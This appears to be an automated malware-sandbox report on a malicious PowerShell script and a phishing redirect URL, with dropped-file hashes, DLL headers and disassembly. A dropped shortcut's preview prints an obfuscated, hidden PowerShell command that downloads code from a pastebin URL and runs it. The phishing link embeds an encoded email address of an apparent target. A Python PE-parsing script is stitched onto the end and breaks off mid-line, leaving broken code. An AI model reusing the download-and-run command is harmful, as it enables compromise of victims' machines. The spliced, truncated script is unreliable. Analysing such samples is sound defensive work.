3b5074b1b5d032e5620f69f9f700ff0e | cr_asm.ps1 | malicious | Unknown | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 162.159.136.232, 104.20.4.235, 172.67.19.24, 185.199.109.133
                                                            No context
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                            Category:dropped
                                                            Size (bytes):1728
                                                            Entropy (8bit):4.527272298423835
                                                            Encrypted:false
                                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                            Malicious:true
                                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11608
                                                            Entropy (8bit):4.890472898059848
                                                            Encrypted:false
                                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                            MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                            SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                            SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                            SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                            Malicious:false
                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllulh:NllU
                                                            MD5:C0BA4C347376EA0710D14593DF2771A6
                                                            SHA1:E6CB3860B9996441DD6479E03A53AFA56BD41FD5
                                                            SHA-256:7C62030CA3A315840A545F0148E9434369BE0529B79B293A8EB57D96E2129D80
                                                            SHA-512:F05B8E12221A87A94E6240557885C29DCCE468C47B28E14D76DDA4B6AD30AADB2CD847912ED45C463B5CE9969588D77B56710B4E1E0FC6FD382238DA82024CAF
                                                            Malicious:false
                                                            Preview:@...e...............................R.O..............@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):5.969417936857653
                                                            TrID:
                                                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                            • Win64 Executable (generic) (12005/4) 10.17%
                                                            • Generic Win/DOS Executable (2004/3) 1.70%
                                                            • DOS Executable Generic (2002/1) 1.70%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                            File name:HQsitBLlOv.dll
                                                            File size:112'128 bytes
                                                            MD5:285e7d2f11c30f89d10887eef102cd74
                                                            SHA1:ce53d9b363bfc3baff51b690f37be27853053fcc
                                                            SHA256:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4
                                                            SHA512:5ea13adb2164f744b0140235ce62b8b9ecd8dbdd36625ad221add16415f3ca37a6d99b30a21e97d7f232345b7dcc1a05781bdfb196303ed7817caada08d3d032
                                                            SSDEEP:3072:mtJPYfAUwG1bIaNgByg1jCgH4F1WsBeMulwl:aYfAtG1bIaOQsm24bWrwl
                                                            TLSH:4EB35A4B62A504FBF1368378C8A34E45E7B6B8150760AF6F07A4435A1F63BD18D3EB61
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'LY.c-7.c-7.c-7.(U4.f-7.(U2..-7.(U3.i-7.c-7.b-7...2.F-7...3.m-7...4.r-7.(U6.`-7.c-6.9-7...>.a-7...7.b-7.....b-7...5.b-7.Richc-7
                                                            Icon Hash:7ae282899bbab082
                                                            Entrypoint:0x1800013fc
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x180000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x66DE3776 [Sun Sep 8 23:47:02 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:3b33a0fd02e658d9e1cdca7d0fcc3364
                                                            Instruction
                                                            dec eax
                                                            mov dword ptr [esp+08h], ebx
                                                            dec eax
                                                            mov dword ptr [esp+10h], esi
                                                            push edi
                                                            dec eax
                                                            sub esp, 20h
                                                            dec ecx
                                                            mov edi, eax
                                                            mov ebx, edx
                                                            dec eax
                                                            mov esi, ecx
                                                            cmp edx, 01h
                                                            jne 00007F2BA4DBA2D7h
                                                            call 00007F2BA4DBA5D4h
                                                            dec esp
                                                            mov eax, edi
                                                            mov edx, ebx
                                                            dec eax
                                                            mov ecx, esi
                                                            dec eax
                                                            mov ebx, dword ptr [esp+30h]
                                                            dec eax
                                                            mov esi, dword ptr [esp+38h]
                                                            dec eax
                                                            add esp, 20h
                                                            pop edi
                                                            jmp 00007F2BA4DBA164h
                                                            int3
                                                            int3
                                                            int3
                                                            inc eax
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            dec eax
                                                            mov ebx, ecx
                                                            xor ecx, ecx
                                                            call dword ptr [0000EBE3h]
                                                            dec eax
                                                            mov ecx, ebx
                                                            call dword ptr [0000EBD2h]
                                                            call dword ptr [0000EBDCh]
                                                            dec eax
                                                            mov ecx, eax
                                                            mov edx, C0000409h
                                                            dec eax
                                                            add esp, 20h
                                                            pop ebx
                                                            dec eax
                                                            jmp dword ptr [0000EBD0h]
                                                            dec eax
                                                            mov dword ptr [esp+08h], ecx
                                                            dec eax
                                                            sub esp, 38h
                                                            mov ecx, 00000017h
                                                            call dword ptr [0000EBC4h]
                                                            test eax, eax
                                                            je 00007F2BA4DBA2D9h
                                                            mov ecx, 00000002h
                                                            int 29h
                                                            dec eax
                                                            lea ecx, dword ptr [0001970Ah]
                                                            call 00007F2BA4DBA49Eh
                                                            dec eax
                                                            mov eax, dword ptr [esp+38h]
                                                            dec eax
                                                            mov dword ptr [000197F1h], eax
                                                            dec eax
                                                            lea eax, dword ptr [esp+38h]
                                                            dec eax
                                                            add eax, 08h
                                                            dec eax
                                                            mov dword ptr [00019781h], eax
                                                            dec eax
                                                            mov eax, dword ptr [000197DAh]
                                                            dec eax
                                                            mov dword ptr [0001964Bh], eax
                                                            Name                                 | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x19370         | 0x58         | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x193c8         | 0x28         | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x1f000         | 0xf8         | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x1c000         | 0x1050       | .pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x20000         | 0x664        | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x17a50         | 0x70         | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x17910         | 0x140        | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_IAT            | 0x10000         | 0x250        | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xeb00 | 0xec00 | 9fe23eb43cbcad6cabdf9eafbecd6cc8 | False | 0.5630958686440678 | data | 6.484254393647746 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x9b88 | 0x9c00 | db85acf07b82096ef00fecb1558c0ecc | False | 0.4267077323717949 | data | 4.699122498052755 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1a000 | 0x1ca8 | 0xc00 | af46192a71fd8a69989b5851533731e7 | False | 0.14225260416666666 | data | 2.0418830550419096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1c000 | 0x1050 | 0x1200 | f0cce2aebb958d7285860ee3522105aa | False | 0.4320746527777778 | data | 4.53353806453801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x1e000 | 0x1f4 | 0x200 | 4ab83cc1ce28301b416d0dd0254e20a6 | False | 0.5234375 | data | 3.7086617662342007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1f000 | 0xf8 | 0x200 | ca220b4e602307c00e829209b4722123 | False | 0.3359375 | data | 2.5249599901333757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x20000 | 0x664 | 0x800 | 37e12b9713770c777edb6bf775fef47a | False | 0.4990234375 | data | 4.880231318845951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
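The section table above is what a static PE walk produces: for every section header, the virtual address and sizes come straight from the 40-byte IMAGE_SECTION_HEADER, the entropy is Shannon entropy over the raw bytes, and the Characteristics column is the flag word decoded. The script below is an added example, not part of the Joe Sandbox report or its tooling; it parses those headers with only the standard library, computes the same per-section entropy and flag list, and flags section names outside the usual linker set (which is how a name like `_RDATA` stands out). The `build_test_pe` helper and its three sections are constructed for the example so it runs offline; point `parse_sections` at real file bytes instead.

```python
import math
import struct

# Section characteristic bits (PE/COFF spec), in the order the report lists them.
SCN_FLAGS = [
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x00000080, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"),
    (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]
# Names the MSVC/MinGW linkers normally emit; anything else is reported as non-standard.
STANDARD_NAMES = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                  ".idata", ".edata", ".bss", ".tls", ".CRT", ".xdata"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def decode_characteristics(flags: int) -> list:
    return [name for bit, name in SCN_FLAGS if flags & bit]


def parse_sections(pe: bytes) -> list:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]      # NumberOfSections
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]         # SizeOfOptionalHeader
    sec_off = coff + 20 + size_opt                                # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        hdr = pe[sec_off + 40 * i: sec_off + 40 * (i + 1)]
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack("<8sIIIIIIHHI", hdr)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        raw = pe[rawptr: rawptr + rawsize]
        sections.append({
            "name": name,
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": rawsize,
            "entropy": shannon_entropy(raw),
            "characteristics": decode_characteristics(chars),
            "non_standard_name": name not in STANDARD_NAMES,
        })
    return sections


def build_test_pe(sections) -> bytes:
    """Constructed minimal PE32+ image for exercising parse_sections (not a real binary).
    `sections` is a list of (name, characteristics, raw_bytes); raw data is 512-byte aligned."""
    size_opt, e_lfanew = 240, 0x40
    hdr_len = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = (hdr_len + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, size_opt, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (size_opt - 2)       # PE32+ magic, rest zeroed
    headers, blobs, va = b"", b"", 0x1000
    for name, chars, raw in sections:
        rawsize = (len(raw) + 0x1FF) & ~0x1FF
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               len(raw), va, rawsize, raw_ptr, 0, 0, 0, 0, chars)
        blobs += raw.ljust(rawsize, b"\0")
        raw_ptr += rawsize
        va += (len(raw) + 0xFFF) & ~0xFFF
    img = dos + b"PE\0\0" + coff + opt + headers
    return img.ljust((hdr_len + 0x1FF) & ~0x1FF, b"\0") + blobs


if __name__ == "__main__":
    sample = build_test_pe([(".text", 0x60000020, bytes(range(256)) * 2),
                            (".data", 0xC0000040, b"\0" * 512),
                            ("_RDATA", 0x40000040, b"ABCD" * 128)])
    for s in parse_sections(sample):
        print(f'{s["name"]:<8} VA=0x{s["virtual_address"]:x} raw=0x{s["raw_size"]:x} '
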